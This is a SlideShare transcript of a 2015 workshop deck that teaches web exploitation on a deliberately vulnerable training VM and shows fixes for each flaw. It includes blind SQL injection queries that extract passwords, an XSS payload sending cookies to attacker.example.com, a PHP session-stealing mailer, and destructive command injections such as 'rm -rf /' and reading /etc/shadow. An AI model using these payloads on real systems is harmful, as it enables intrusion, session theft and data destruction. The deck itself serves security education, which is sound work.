SlideShare a Scribd company logo
1 of 69
Download to read offline
Hacking Sites for Fun and
Profit
OpenWest 2015
David Stockton
or How to Hack
Websites and Prevent
Your Site from Being
Hacked
What this is for
• Learn how common exploits are
done and how to identify code
that is vulnerable
• Learn how to fix code that is
susceptible to these attacks
• Learn how to attack your own
code and your own sites so you
can fix them
What this is not for
• Hacking or attacking sites
that you do not have
permission to attack
• If you don’t have permission,
don’t do it.
The Code
• The code I am showing you is
similar to real code I’ve seen in
real projects, but it was written
specifically for this presentation.
Gouda Times
• Provided on the VM is a hackable site - The
Gouda Times cheese shop and social
cheese site
What you need
• Virtualbox 4.3
• The VM
• A browser (preferably chrome but any
works)
• Something to send HTTP requests to the
server on the VM
Getting Started
• Copy the contents of the thumb drive -
• There are 4 files:
• Virtualbox for Mac and Windows
• The VM
• An image
Import the VM
• Start the VM in virtual box and log into the console (vagrant /
vagrant)
• ifconfig -a
• Find eth*
• Edit /etc/sysconfig/network-scripts/ifcfg-eth1
• Change DEVICE= to match eth* from above
• sudo service network restart
• mailcatcher —ip=0.0.0.0
One note about email
• On the VM is mailcatcher. It will catch any
emails that the system or you cause to be
sent. You can access it at http://
hacksite.dev:1080/
To play fair
• Don’t go on the VM after the initial set up.
However, all the code is there and if you
really want to look, feel free:
• /vagrant_web
• Try to figure out some exploits without
looking at the code first though
On your host
• Ping 192.168.33.199
• ssh vagrant@192.168.33.199 (password
vagrant)
• If this works, add a host entry (/etc/hosts
or /windws/system32/driver/etc/hosts for
hackingsite.dev to 192.168.33.199
Open your browser
Start hacking
• There are loads and loads of vulnerabilities
• If you break the VM, just re-import and start
again
• This is your VM on your computer. Anything
destructive you do is on you. Be sure you’re in
the VM before seeing if 



rm -rf /* works
A brief introduction to
common exploits
• In case this is all completely new
Exploit 1:
• SQL injection
• select * from users where
username =
'$_POST['username']';
SQL Injection
• $_POST['username'] = “' OR
1=1; --;”;
• select * from users where
username = '' OR 1=1; --;';
SQL Injection
• $_GET
• $_POST
• $_REQUEST
• what else...
SQL Injection
• $_COOKIE
• values from the database
• Some parts of $_SERVER
Errors can help attackers
• Showing SQL errors can help attackers fix SQL injection
attempts
• Other errors can help in other ways (some show
passwords)
• Turn off display_errors in production, but log errors
always
Blind SQL injection
• Make calls that take
varying amounts of time to
run. Use the time to
determine the answers to
questions about the
systems you are attacking.
Blind SQL injection
• http://news.org/news.php?id=5
• http://news.org/news.php?id=5 and 1=1
• http://news.org/news.php?id=5 and 1=2
Determine DB version
• news.php?id=5 and
substring(@@version,
1,1)=5
Subselects?
•
news.php?id=5 and
(select 1) = 1
Access to other databases/
tables
• news.php?id=12 and
(select 1 from mysql.user
limit 0,1) = 1
Guessing tables
• news.php?id=6 and
(select 1 from users
limit 0,1) =1
Guessing column names
• news.php?id=11 and (select
substring(concat(1, password),1,1) from
users limit 0,1)=1
Guessing data
• news.php?id=4 and
ascii(substring((SELECT concat(username,
0x3a, password) from users limit 0,1),
1,1))>80
• Increment to guess values letter by letter
Preventing SQL Injection
● mysql_real_escape_string
● Prepared statements
● Input validation and whitelists
Exploit 2:
• XSS
• Cross-site Scripting
What is it?
• User supplied
code running in
the browser
So? It’s their browser
• Yep, but it may not
be their code.
So? It’s their browser
• It may not be your
code, but it might
call your code in a
way you don’t want
XSS Code
<img src=”<?php echo $_POST[‘image’];?>”>
<.. javascript to open the print dialog ..>
So what?
• What if we post code into
$_POST[‘image’]
● Steal session cookies
● Call Javascript APIs to cause actions
on the server (CSRF)
● Post forms as the user
The payload:
$_POST[‘image’]
/images/add.gif"><script type="text/
javascript">alert('xss!');</script><img
src="
Ermahgerd er perperp.
Ooh, that’s soooo malicious,
I’m totally shaking right now
• Fine. How about this.
• image = /images/add.gif"><script type="text/
javascript">document.write('<img src="http://
attacker.example.com/session.php?' +
document.cookie + '">'); </script><img src="
WTH did that do?
• Javascript ran FROM the site
we’re attacking and it sent
your site cookies to a script
the attacker controls.
So you stole my cookie. So
what?
• Here’s what.
<?php

$session = $_GET['PHPSESSID'];

$body = 'Got session: ' . $session;

mail('attackeremail@attacker.example.org',
'Session Captured', $body);
Oooh, you emailed my
cookie... So...
Now it’s my turn...
Why this matters
• Sites identify and authenticate
users with session.
• I have identified myself as you. I
am now logged in as you and
can do anything you can do on
the site.
Ok, so I can steal my own
session
• Here’s how to use
it against someone.
The first part of the attack
• Create an email to a link on the
attacking site that posts the code to the
site under attack. Send the email to the
victim.
• They click the link, you steal their
session.
What else can I do?
• Cross Site Request Forgery (CSRF)
• Causing actions to happen on the user’s
behalf
• Purchasing things, changing passwords,
creating accounts, etc.
How to prevent?
• Escape output
• Whitelist URLs, domains, input
• Make the print page lookup and use image
paths from a trusted source (database
maybe?)
Prevent CSRF
• Use a CSRF token.
• Disallow requests
that don’t contain the
correct token.
Exploit prevention in
general
• Filter input
• Escape output
• This works for SQL injection, XSS and
more...
• in general
Exploit 3: Command
injection
● shell_exec
● exec
● passthru
● system
● `some command`
PHP Web File Browser
• Supposed to allow viewing of files within
the web directories
• $files = shell_exec(‘ls -al ’ .
$_GET[‘dir’]);
What’s the danger?
• $_GET[‘dir’] = ‘.; rm -rf / *’;
• Or whatever.
• cat /etc/passwd; cat /etc/shadow
How to prevent?
• If you must use user input in a command,
use escapeshellarg()
• $dir = escapeshellarg($_GET[‘dir’]);
• $files = shell_exec(‘ls -al ‘ . $dir);
• Validate that the input is allowed
Other types of injection
● Code (eval)
● Regex
● Log
● LDAP
Other exploits
● Authentication / Session management
● Information disclosure
● Sensitive data exposure
● File upload flaws
● Unchecked redirects
● Leftover debug code
● Session fixation
● Internal threats
● Privacy Violation (password in logs,
etc)
Mitigation
• Validation on the client
• Reject invalid requests entirely, log
intrusion attempt
• Principle of least privilege
• Filter input, escape output
One more exploit
• Session puzzling attack
• http://bit.ly/1eO7jPK
Session Puzzling
• Making requests to privileged and
unprivileged pages in a particular order
that can escalate privileges of the attacker
How it could work
• Page requiring authentication looks for
‘user’ in session to determine
authentication
Session Puzzling
• Login -> forgot password page sends
information via ‘user’ in session
Put it together
• Hit pages quickly in this order:
• Login -> forgot password / privileged page
• Privileged page sees ‘user’ and allows
attacker in
How was this found?
• By accident, via web crawler getting
access to privileged pages
Now what?
• Find as many exploits as possible in
Gouda Times
• Be creative, you can use multiple exploits
in a single creative hack
• Stuck for ideas?
Ideas
• Trick the system to give up another user’s
password
• Log in to the system as another user
without knowing their password
• Change guestbook entries
• Remove guestbook entries
More ideas
• View nearly any file on the system
• Get your own code onto the system
• Find hidden functionality
• Exploit the site with an image
• Create more users than the system thinks you should
have
• Social engineering - get someone to tell you a password
Time to get with the
hacking
If you have questions or
need help I’ll be around
• If you get a hack to work, let me know and
you can share what you did and how
• If you want to try to fix it, the source is on
the VM - show me your fix, I’ll try to break it
Want to hack more?
• http://www.badstore.net/
• http://google-gruyere.appspot.com/
• http://www.dvwa.co.uk/
Please rate this tutorial
• https://joind.in/14040

More Related Content

What's hot

Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultMohammed ALDOUB
 
OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache OltuOAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache OltuAntonio Sanso
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...Jakub Kałużny
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2Chris Gates
 
Abusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS appsAbusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS appsSecuRing
 
Defending Against Attacks With Rails
Defending Against Attacks With RailsDefending Against Attacks With Rails
Defending Against Attacks With RailsTony Amoyal
 
Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profitDavid Stockton
 
The art of android hacking
The art of  android hackingThe art of  android hacking
The art of android hackingAbhinav Mishra
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)Larry Cashdollar
 
Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09heikowebers
 
Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Rob Fuller
 
Web Application Hacking
Web Application HackingWeb Application Hacking
Web Application HackingSensePost
 
Ten Commandments of Secure Coding
Ten Commandments of Secure CodingTen Commandments of Secure Coding
Ten Commandments of Secure CodingMateusz Olejarka
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Peter Sabev
 
Security In .Net Framework
Security In .Net FrameworkSecurity In .Net Framework
Security In .Net FrameworkRamakanta Behera
 
Top Ten Tips For Tenacious Defense In Asp.Net
Top Ten Tips For Tenacious Defense In Asp.NetTop Ten Tips For Tenacious Defense In Asp.Net
Top Ten Tips For Tenacious Defense In Asp.Netalsmola
 

What's hot (18)

Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by Default
 
OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache OltuOAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
 
Abusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS appsAbusing & Securing XPC in macOS apps
Abusing & Securing XPC in macOS apps
 
Google Hacking
Google HackingGoogle Hacking
Google Hacking
 
Defending Against Attacks With Rails
Defending Against Attacks With RailsDefending Against Attacks With Rails
Defending Against Attacks With Rails
 
Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profit
 
The art of android hacking
The art of  android hackingThe art of  android hacking
The art of android hacking
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
 
Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09
 
Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?Why isn't infosec working? Did you turn it off and back on again?
Why isn't infosec working? Did you turn it off and back on again?
 
Web Application Hacking
Web Application HackingWeb Application Hacking
Web Application Hacking
 
Ten Commandments of Secure Coding
Ten Commandments of Secure CodingTen Commandments of Secure Coding
Ten Commandments of Secure Coding
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)
 
Security In .Net Framework
Security In .Net FrameworkSecurity In .Net Framework
Security In .Net Framework
 
CCC - Lend me your IR's
CCC - Lend me your IR'sCCC - Lend me your IR's
CCC - Lend me your IR's
 
Top Ten Tips For Tenacious Defense In Asp.Net
Top Ten Tips For Tenacious Defense In Asp.NetTop Ten Tips For Tenacious Defense In Asp.Net
Top Ten Tips For Tenacious Defense In Asp.Net
 

Viewers also liked

Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profitDavid Stockton
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
 
Evaporation New Template
Evaporation New TemplateEvaporation New Template
Evaporation New Templatedloschiavo
 
What is hacking | Types of Hacking
What is hacking | Types of HackingWhat is hacking | Types of Hacking
What is hacking | Types of HackingGOPCSOFT
 
Cybercrime (Computer Hacking)
Cybercrime (Computer Hacking)Cybercrime (Computer Hacking)
Cybercrime (Computer Hacking)Michael Asres
 
Basic Introduction to hacking
Basic Introduction to hackingBasic Introduction to hacking
Basic Introduction to hackingSainath Volam
 
Soil Steady-State Evaporation
Soil Steady-State EvaporationSoil Steady-State Evaporation
Soil Steady-State EvaporationMorteza Sadeghi
 
AMAZING COMPUTER TRICKS
AMAZING COMPUTER TRICKSAMAZING COMPUTER TRICKS
AMAZING COMPUTER TRICKSMarc Jones
 
CFD-based Evaporation Estimation Approach
CFD-based Evaporation Estimation ApproachCFD-based Evaporation Estimation Approach
CFD-based Evaporation Estimation ApproachAli Abbasi
 
Water evaporation reduction from lakes
Water evaporation reduction from lakesWater evaporation reduction from lakes
Water evaporation reduction from lakesguestb311d8
 

Viewers also liked (20)

Hacking sites for fun and profit
Hacking sites for fun and profitHacking sites for fun and profit
Hacking sites for fun and profit
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
 
Internet and personal privacy
Internet and personal privacyInternet and personal privacy
Internet and personal privacy
 
Is hacking good or bad
Is hacking good or badIs hacking good or bad
Is hacking good or bad
 
my new HACKING
my new HACKINGmy new HACKING
my new HACKING
 
Hacking
HackingHacking
Hacking
 
Evaporation New Template
Evaporation New TemplateEvaporation New Template
Evaporation New Template
 
What is hacking | Types of Hacking
What is hacking | Types of HackingWhat is hacking | Types of Hacking
What is hacking | Types of Hacking
 
Hacking 1
Hacking 1Hacking 1
Hacking 1
 
Evaporation
EvaporationEvaporation
Evaporation
 
Cybercrime (Computer Hacking)
Cybercrime (Computer Hacking)Cybercrime (Computer Hacking)
Cybercrime (Computer Hacking)
 
Basic Introduction to hacking
Basic Introduction to hackingBasic Introduction to hacking
Basic Introduction to hacking
 
Hacking Movable Type
Hacking Movable TypeHacking Movable Type
Hacking Movable Type
 
Group 4 (evaporation)
Group 4 (evaporation)Group 4 (evaporation)
Group 4 (evaporation)
 
Soil Steady-State Evaporation
Soil Steady-State EvaporationSoil Steady-State Evaporation
Soil Steady-State Evaporation
 
Science - Evaporation
Science - EvaporationScience - Evaporation
Science - Evaporation
 
AMAZING COMPUTER TRICKS
AMAZING COMPUTER TRICKSAMAZING COMPUTER TRICKS
AMAZING COMPUTER TRICKS
 
CFD-based Evaporation Estimation Approach
CFD-based Evaporation Estimation ApproachCFD-based Evaporation Estimation Approach
CFD-based Evaporation Estimation Approach
 
Water evaporation reduction from lakes
Water evaporation reduction from lakesWater evaporation reduction from lakes
Water evaporation reduction from lakes
 
Hacking And EthicalHacking By Satish
Hacking And EthicalHacking By SatishHacking And EthicalHacking By Satish
Hacking And EthicalHacking By Satish
 

Similar to Hacking sites for fun and profit

Thoughts on Defensive Development for Sitecore
Thoughts on Defensive Development for SitecoreThoughts on Defensive Development for Sitecore
Thoughts on Defensive Development for SitecorePINT Inc
 
External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) Volkan Özçelik
 
External JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesExternal JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesVolkan Özçelik
 
Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Volkan Özçelik
 
Open source security
Open source securityOpen source security
Open source securitylrigknat
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub  - A case study of django web applications that are secur...Mr. Mohammed Aldoub  - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...nooralmousa
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)Larry Cashdollar
 
Crypto Miners in the Cloud
Crypto Miners in the CloudCrypto Miners in the Cloud
Crypto Miners in the CloudTeri Radichel
 
Workshop on Network Security
Workshop on Network SecurityWorkshop on Network Security
Workshop on Network SecurityUC San Diego
 
Ch 12 Attacking Users - XSS
Ch 12 Attacking Users - XSSCh 12 Attacking Users - XSS
Ch 12 Attacking Users - XSSSam Bowne
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingCNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingSam Bowne
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingCNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingSam Bowne
 
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...AlienVault
 
Website Hacking and Preventive Measures
Website Hacking and Preventive MeasuresWebsite Hacking and Preventive Measures
Website Hacking and Preventive MeasuresShubham Takode
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysJoff Thyer
 
JWT Authentication with AngularJS
JWT Authentication with AngularJSJWT Authentication with AngularJS
JWT Authentication with AngularJSrobertjd
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101 Stormpath
 
XSS (Cross Site Scripting)
XSS (Cross Site Scripting)XSS (Cross Site Scripting)
XSS (Cross Site Scripting)Shubham Gupta
 

Similar to Hacking sites for fun and profit (20)

Thoughts on Defensive Development for Sitecore
Thoughts on Defensive Development for SitecoreThoughts on Defensive Development for Sitecore
Thoughts on Defensive Development for Sitecore
 
External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1)
 
External JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesExternal JavaScript Widget Development Best Practices
External JavaScript Widget Development Best Practices
 
Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012
 
Open source security
Open source securityOpen source security
Open source security
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub  - A case study of django web applications that are secur...Mr. Mohammed Aldoub  - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
 
Crypto Miners in the Cloud
Crypto Miners in the CloudCrypto Miners in the Cloud
Crypto Miners in the Cloud
 
Workshop on Network Security
Workshop on Network SecurityWorkshop on Network Security
Workshop on Network Security
 
Ch 12 Attacking Users - XSS
Ch 12 Attacking Users - XSSCh 12 Attacking Users - XSS
Ch 12 Attacking Users - XSS
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingCNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingCNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
 
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
 
Website Hacking and Preventive Measures
Website Hacking and Preventive MeasuresWebsite Hacking and Preventive Measures
Website Hacking and Preventive Measures
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
 
JWT Authentication with AngularJS
JWT Authentication with AngularJSJWT Authentication with AngularJS
JWT Authentication with AngularJS
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101
 
XSS (Cross Site Scripting)
XSS (Cross Site Scripting)XSS (Cross Site Scripting)
XSS (Cross Site Scripting)
 
Internet Security
Internet SecurityInternet Security
Internet Security
 
How to hack or what is ethical hacking
How to hack or what is ethical hackingHow to hack or what is ethical hacking
How to hack or what is ethical hacking
 

More from David Stockton

Phone calls and sms from php
Phone calls and sms from phpPhone calls and sms from php
Phone calls and sms from phpDavid Stockton
 
The Art of Transduction
The Art of TransductionThe Art of Transduction
The Art of TransductionDavid Stockton
 
Using queues and offline processing to help speed up your application
Using queues and offline processing to help speed up your applicationUsing queues and offline processing to help speed up your application
Using queues and offline processing to help speed up your applicationDavid Stockton
 
Intermediate OOP in PHP
Intermediate OOP in PHPIntermediate OOP in PHP
Intermediate OOP in PHPDavid Stockton
 
Building APIs with Apigilty and Zend Framework 2
Building APIs with Apigilty and Zend Framework 2Building APIs with Apigilty and Zend Framework 2
Building APIs with Apigilty and Zend Framework 2David Stockton
 
Intermediate OOP in PHP
Intermediate OOP in PHPIntermediate OOP in PHP
Intermediate OOP in PHPDavid Stockton
 
Common design patterns in php
Common design patterns in phpCommon design patterns in php
Common design patterns in phpDavid Stockton
 
Intermediate oop in php
Intermediate oop in phpIntermediate oop in php
Intermediate oop in phpDavid Stockton
 
Increasing code quality with code reviews (poetry version)
Increasing code quality with code reviews (poetry version)Increasing code quality with code reviews (poetry version)
Increasing code quality with code reviews (poetry version)David Stockton
 
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSH
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSHTame Your Build And Deployment Process With Hudson, PHPUnit, and SSH
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSHDavid Stockton
 
Mercurial Distributed Version Control
Mercurial Distributed Version ControlMercurial Distributed Version Control
Mercurial Distributed Version ControlDavid Stockton
 
Regular expressions and php
Regular expressions and phpRegular expressions and php
Regular expressions and phpDavid Stockton
 

More from David Stockton (17)

Phone calls and sms from php
Phone calls and sms from phpPhone calls and sms from php
Phone calls and sms from php
 
The Art of Transduction
The Art of TransductionThe Art of Transduction
The Art of Transduction
 
Using queues and offline processing to help speed up your application
Using queues and offline processing to help speed up your applicationUsing queues and offline processing to help speed up your application
Using queues and offline processing to help speed up your application
 
Intermediate OOP in PHP
Intermediate OOP in PHPIntermediate OOP in PHP
Intermediate OOP in PHP
 
Building APIs with Apigilty and Zend Framework 2
Building APIs with Apigilty and Zend Framework 2Building APIs with Apigilty and Zend Framework 2
Building APIs with Apigilty and Zend Framework 2
 
API All the Things!
API All the Things!API All the Things!
API All the Things!
 
Intermediate OOP in PHP
Intermediate OOP in PHPIntermediate OOP in PHP
Intermediate OOP in PHP
 
Beginning OOP in PHP
Beginning OOP in PHPBeginning OOP in PHP
Beginning OOP in PHP
 
Common design patterns in php
Common design patterns in phpCommon design patterns in php
Common design patterns in php
 
Intermediate oop in php
Intermediate oop in phpIntermediate oop in php
Intermediate oop in php
 
Grokking regex
Grokking regexGrokking regex
Grokking regex
 
Increasing code quality with code reviews (poetry version)
Increasing code quality with code reviews (poetry version)Increasing code quality with code reviews (poetry version)
Increasing code quality with code reviews (poetry version)
 
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSH
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSHTame Your Build And Deployment Process With Hudson, PHPUnit, and SSH
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSH
 
Mercurial Distributed Version Control
Mercurial Distributed Version ControlMercurial Distributed Version Control
Mercurial Distributed Version Control
 
Regular expressions and php
Regular expressions and phpRegular expressions and php
Regular expressions and php
 
PHP 5 Magic Methods
PHP 5 Magic MethodsPHP 5 Magic Methods
PHP 5 Magic Methods
 
FireBug And FirePHP
FireBug And FirePHPFireBug And FirePHP
FireBug And FirePHP
 

Recently uploaded

The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality AssuranceInflectra
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
